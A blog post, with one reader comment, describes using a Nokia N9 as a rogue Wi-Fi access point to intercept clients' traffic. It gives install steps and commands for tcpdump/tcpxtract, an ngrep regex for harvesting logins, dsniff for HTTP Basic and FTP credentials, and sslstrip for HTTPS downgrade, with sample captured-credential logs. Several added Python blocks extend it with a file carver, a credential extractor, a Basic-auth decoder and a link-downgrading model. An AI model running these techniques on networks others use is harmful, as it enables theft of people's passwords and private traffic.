true-binary.com – code is poetry…

the n9 as an evil access point #mitm

01.02.2013 (1:22 am) – Filed under: computing, debian, linux, meego

Prelude: I used all of these tools for development and private use only, i.e. you shouldn't take this into a coffee shop, call your hotspot "Free-Wifi" and turn the encryption off :P

Last month I looked for a way to use my n9 as a packet sniffer, and I figured out some useful stuff …

… my train of thought was: how can I sniff whatever is transmitted through my stock wifi hotspot (JoikuSpot) …

… so here's a guideline of what I got working and how it works:

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:

I AM WORKING IN OPEN MODE, SO I DON'T KNOW IF IT WORKS WITH THE STOCK KERNEL!!!

1. tcpdump + tcpxtract
2. ngrep
3. dsniff
4. sslstrip?

1. tcpdump + tcpxtract:

tcpdump is a very powerful packet analyzer – you can dump nearly all traffic with this tool …

tcpxtract carves files out of tcpdump pcap files: it searches the captured payload bytes for known file headers (magic bytes) and cuts until the matching footer …

let’s install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface wlan0 [-i], with a snaplen of 1500 bytes [-s] so whole frames are kept instead of the default truncated ones, without resolving addresses to names [-n], writing the raw packets to a pcap file [-w] and capturing only traffic to or from port 80 [port 80]

open a website on the client … tcpdump will capture it.

when you think you are finished, kill tcpdump [ctrl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/

Found file of type “html” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type “png” in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type “png” in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

Found file of type “png” in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

… and so on, that's what the output looks like. (Don't let the port numbers confuse you: tcpxtract prints them byte-swapped, 20480 is 0x5000, i.e. port 80 = 0x0050 with the two bytes reversed.)

I LIKE! :)
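The carving tcpxtract does above is simple enough to show in a few lines. The following is an added Python example, not tcpxtract's code and not from the original post: it scans a byte blob for known file headers and cuts until the matching footer. The signature table, the `carve` function and the sample stream (a constructed HTTP response with a structurally fake PNG and a tiny HTML page) are this example's own assumptions; only the magic bytes are the real ones.

```python
# Added example: signature-based file carving in the style of tcpxtract.
# The table below is an assumption of this example (tcpxtract keeps its own in
# tcpxtract.conf); the header/footer bytes themselves are the real magic values.
SIGNATURES = {
    "png":  (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),   # IEND chunk + its fixed CRC
    "jpg":  (b"\xff\xd8\xff",      b"\xff\xd9"),
    "html": (b"<html",             b"</html>"),
}

def carve(data, signatures=SIGNATURES, max_size=1_000_000):
    """Return [(kind, bytes), ...] for every header..footer span in data, in
    offset order. A header with no footer within max_size bytes is skipped, so
    one truncated file cannot swallow the rest of the stream."""
    found = []
    pos = 0
    while True:
        # earliest header of any type from the current position
        best = None
        for kind, (header, footer) in signatures.items():
            i = data.find(header, pos)
            if i != -1 and (best is None or i < best[0]):
                best = (i, kind, header, footer)
        if best is None:
            return found
        start, kind, header, footer = best
        end = data.find(footer, start + len(header), start + max_size)
        if end == -1:
            pos = start + 1            # header without footer: skip it, keep scanning
            continue
        end += len(footer)
        found.append((kind, data[start:end]))
        pos = end

# Constructed sample (not a real capture): two HTTP responses back to back, one
# carrying a minimal PNG with zeroed CRCs, one carrying a tiny HTML page.
SAMPLE_PNG = (
    b"\x89PNG\r\n\x1a\n"
    + b"\x00\x00\x00\rIHDR" + b"\x00" * 13 + b"\x00" * 4
    + b"\x00\x00\x00\x00IEND\xaeB`\x82"
)
SAMPLE_HTML = b"<html><body>hello</body></html>"
SAMPLE_STREAM = (
    b"HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n\r\n" + SAMPLE_PNG
    + b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + SAMPLE_HTML
)

if __name__ == "__main__":
    for kind, blob in carve(SAMPLE_STREAM):
        print(kind, len(blob), "bytes")
```

Carving only works when the file bytes appear verbatim in the payload: a response sent with Content-Encoding: gzip, or anything inside TLS, yields nothing, and chunked transfer encoding leaves chunk-size lines inside the carved file.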

2. ngrep

ngrep is a very powerful tool as well – it lets you grep live traffic with regular expressions …

I'm going to show you how to filter the traffic with a regular expression to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install libpcap0.8

here’s ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again ;) ]:

/home/user/dev/sniffer # ngrep '[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)' -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (I got segfaults from time to time when I started it on wlan0), to make stdout line-buffered [-l] (useful when capturing to a file: ngrep … >ngrep.log 2>&1, in that order, otherwise stderr still goes to the terminal) and filter the traffic by ports [port 80 or port 25 or port 110]

… What it doesn't catch is htaccess logins: HTTP Basic auth sends user and password base64-encoded in a single Authorization header, so the regex never sees a user= or pass= field. I use dsniff for those.

3. dsniff

dsniff? – omg, it’s awesome! it includes:

arpspoof  – Send out unrequested (and possibly forged) arp replies.
dnsspoof  – forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff    – password sniffer for several protocols.
filesnarf – saves selected files sniffed from NFS traffic.
macof     – flood the local network with random MAC addresses.
mailsnarf – sniffs mail on the LAN and stores it in mbox format.
msgsnarf  – record selected messages from different Instant Messengers.
sshmitm   – SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow     – SSH traffic analyser.
tcpkill   – kills specified in-progress TCP connections.
tcpnice   – slow down specified TCP connections via “active” traffic shaping.
urlsnarf  – output selected URLs sniffed from HTTP traffic in CLF.
webmitm   – HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy    – sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff has some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here’s dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! – should be working now :)

dsniff itself is very simple to use – it has built-in protocol decoders. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

—————–
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

—————–
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] … again I got segfaults when listening on wlan0.
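To make concrete what the ngrep regex above catches, what it misses, and what the [thisis:htaccessdump] that dsniff prints actually is, here is an added Python example (not ngrep's or dsniff's code, and not from the original post). It runs the page's regex verbatim, an extended variant that is this example's own assumption, and a Basic-auth decoder over constructed sample payloads; the sample requests are made up for this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# The regular expression from the ngrep command on this page, verbatim.
NGREP_PATTERN = r"[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)"

# Extended variant (this example's assumption, not from the page): also matches at
# the very start of a payload, and knows WordPress's "log" and a plain "email" field.
EXTENDED_PATTERN = (
    r"(?:^|[&\s?])"
    r"(?:log(?:in)?|email|user(?:name)?|p(?:ass(?:word|wd)?|wd?))"
    r"[\s:=]\s?([^&\s]*)"
)

# HTTP Basic auth: what the ngrep regex never sees, because user and password are
# base64-encoded inside one header instead of being sent as user=/pass= fields.
BASIC_AUTH = re.compile(r"^authorization:\s*basic\s+([A-Za-z0-9+/=]+)",
                        re.IGNORECASE | re.MULTILINE)

def extract_fields(payload, pattern=NGREP_PATTERN):
    """Return [(field, value), ...] for every credential-looking field in one
    TCP payload, in the order ngrep -i would flag them. Values are URL-decoded."""
    found = []
    for m in re.finditer(pattern, payload, re.IGNORECASE):
        name = re.match(r"[&\s?]?(\w+)", m.group(0)).group(1)  # word after the separator
        value = unquote_plus(m.groups()[-1])                     # last group is the value
        found.append((name, value))
    return found

def decode_basic_auth(payload):
    """Return [(user, password), ...] for every Authorization: Basic header in an
    HTTP request, i.e. the pair dsniff prints in [brackets] after the header."""
    creds = []
    for m in BASIC_AUTH.finditer(payload):
        token = m.group(1)
        try:
            raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        except (binascii.Error, ValueError):
            continue  # garbage that only looks like base64: skip it, don't crash
        user, _, password = raw.decode("utf-8", "replace").partition(":")  # split at first ':'
        creds.append((user, password))
    return creds

# Constructed sample payloads (not captures from the page).
WORDPRESS_LOGIN = (
    "POST /wp-login.php HTTP/1.1\r\n"
    "Host: www.true-binary.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "log=ohyes&pwd=itworks&wp-submit=Log+In&testcookie=1"
)
FORM_LOGIN = "username=alice&password=s3cr%21t"
FTP_SESSION = "USER bob\r\nPASS hunter2\r\n"
HTACCESS_REQUEST = (
    "GET / HTTP/1.0\r\n"
    "Host: server.idonttellyou.com\r\n"
    "Authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA==\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, payload in [("wordpress", WORDPRESS_LOGIN), ("form", FORM_LOGIN),
                          ("ftp", FTP_SESSION), ("htaccess", HTACCESS_REQUEST)]:
        print(name, "ngrep:", extract_fields(payload),
              "extended:", extract_fields(payload, EXTENDED_PATTERN),
              "basic:", decode_basic_auth(payload))
```

Two things the page's regex quietly misses show up here: the field has to be preceded by `&`, whitespace or `?`, so a name at the very start of a packet payload (FTP's `USER bob`, or `username=` as the first form field) is never reported, and WordPress's login field is called `log`, not `login`, so only the `pwd` half of the wp-login POST on this page is flagged. The extended pattern fixes both; the Basic-auth decoder is the part ngrep cannot do at all and dsniff does for you.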

4. sslstrip?

sslstrip downgrades https connections to http: it sits in front of the client as an HTTP proxy, rewrites every https:// link and redirect in the server's responses to http://, and keeps talking TLS to the real server itself, so the client's form data travels to the proxy in plaintext …

… I found a way to pipe my local connection through sslstrip, but not the hotspot-connected client's.

All I did was modify my APN connection: I enabled the http_proxy on 127.0.0.1 port 10000, changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode "manual"), deactivated and activated the connection again and fired up sslstrip.

An alternative for testing is to set the http proxy in Firefox.

What I figured out is that JoikuSpot doesn't use the APN entry from the phone settings: I tried to add a second APN with some changed settings and it didn't show up in the JoikuSpot properties. Maybe that's why it doesn't pick up the proxy settings from the APN … anyway, I'm still working on a workaround!
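To show the two halves of the downgrade in code, here is an added Python example, a minimal model of the technique and not sslstrip's own code or anything from the original post. It assumes a proxy that keeps a set of hosts whose links it downgraded; the sample page and Location header are constructed for this example.

```python
import re

# Added example: a minimal model of what sslstrip does (not sslstrip's code).
# Matches absolute https:// URLs in HTML, headers or redirect targets.
HTTPS_URL = re.compile(r"""https://([A-Za-z0-9.-]+(?::\d+)?)(/[^\s"'<>]*)?""")

def strip_secure_links(text, stripped_hosts):
    """Rewrite every https:// URL in a server response (a body or a Location:
    header value) to http://, and remember the host so the proxy knows to keep
    using TLS upstream for it. Returns the rewritten text."""
    def downgrade(m):
        host, path = m.group(1), m.group(2) or ""
        stripped_hosts.add(host.lower())
        return "http://" + host + path
    return HTTPS_URL.sub(downgrade, text)

def upstream_url(host, path, stripped_hosts):
    """For a plaintext request the client now sends to the proxy, pick the scheme
    the proxy uses towards the real server: https if the client only got here
    through a link we downgraded, plain http otherwise."""
    scheme = "https" if host.lower() in stripped_hosts else "http"
    return f"{scheme}://{host}{path}"

# Constructed sample (not a capture): a login form posting over TLS plus one plain image.
SAMPLE_BODY = (
    '<form action="https://www.example.com/login" method="post">'
    '<img src="http://cdn.example.com/logo.png"></form>'
)
SAMPLE_LOCATION = "https://www.example.com/account?next=%2Fhome"

def demo():
    """Run both halves over the sample; returns (body, location, downgraded hosts)."""
    hosts = set()
    body = strip_secure_links(SAMPLE_BODY, hosts)
    location = strip_secure_links(SAMPLE_LOCATION, hosts)
    return body, location, sorted(hosts)

if __name__ == "__main__":
    body, location, hosts = demo()
    print(body)
    print("Location:", location)
    print(upstream_url("www.example.com", "/login", set(hosts)))    # proxy still uses TLS here
    print(upstream_url("cdn.example.com", "/logo.png", set(hosts)))  # never was TLS, stays http
```

The same rewrite is applied to response bodies and to Location headers, because a 301/302 to https:// is exactly how most sites move a user from the plain landing page to the login page. Note the limit of the technique: a browser that already holds an HSTS entry for the site refuses to follow the http:// link at all, and a user who types https:// by hand never passes through the plaintext leg.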

Here’s sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up…

/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode "manual"

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C

… I also got webmitm/mitmproxy running (they forge the server's SSL certificate, which a client that hasn't installed the forging CA will warn about); as that's neither an efficient nor an elegant way to work, I won't explain it.

cheers!

9 Responses to “the n9 as an evil access point #mitm”

  1. sds Says:

    when I type this code in the terminal:

    tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

    it said:

    sh: tcpdump: not found

    but when installing tcpdump and libpcap0.8

    it said:

    you have installed the latest version of tcpdump and libpcap0.8 !!!

    Can you explain this post step by step, please?
